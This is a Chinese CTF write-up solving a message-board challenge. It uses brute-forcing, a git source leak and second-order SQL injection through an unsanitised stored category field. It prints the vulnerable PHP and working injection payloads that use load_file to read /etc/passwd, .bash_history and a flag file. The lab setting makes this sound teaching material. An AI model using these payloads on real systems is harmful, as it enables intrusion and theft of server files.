打开题目是一个留言板界面,猜测存在二次注入。
发帖需要登录,提示用户名为zhangwei,密码为zhangwei***,后三位需要爆破,结果为zhangwei666
登录成功后,在控制台可以看到提示,存在git泄露。
源码显示不完全,需要回溯一下。
完整源码:
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
header("Location: ./login.php");
die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
$category = addslashes($_POST['category']);
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);
$sql = "insert into board
set category = '$category',
title = '$title',
content = '$content'";
$result = mysql_query($sql);
header("Location: ./index.php");
break;
case 'comment':
$bo_id = addslashes($_POST['bo_id']);
$sql = "select category from board where id='$bo_id'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if($num>0){
$category = mysql_fetch_array($result)['category'];
$content = addslashes($_POST['content']);
$sql = "insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";
$result = mysql_query($sql);
}
header("Location: ./comment.php?id=$bo_id");
break;
default:
header("Location: ./index.php");
}
}
else{
header("Location: ./index.php");
}
?>
从源码中看到对数据进行了addslashes转义。
这里看到直接取出了我们发帖是的category的值拼接到下面的sql语句里面,确定存在二次注入。
到这里死活注不出来,参考大佬的wp,原来这里的
是换行的,用#时注释不了的,要用/**/.
验证:发帖时,category:',content=user(),/*
发帖后进入详情页面,留言*/#
看到注入成功,参考wp是要读文件。
',content=(load_file("/etc/passwd")),/*
读最后一行的bin/bash
.bash_history文件保存了当前用户使用过的历史命令
', content=(load_file('/home/www/.bash_history')),/*
', content=hex(load_file('/tmp/html/.DS_Store')),/*
是一串十六进制,转成字符串后看到:
',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*
参考
https://blog.csdn.net/weixin_43940853/article/details/105121265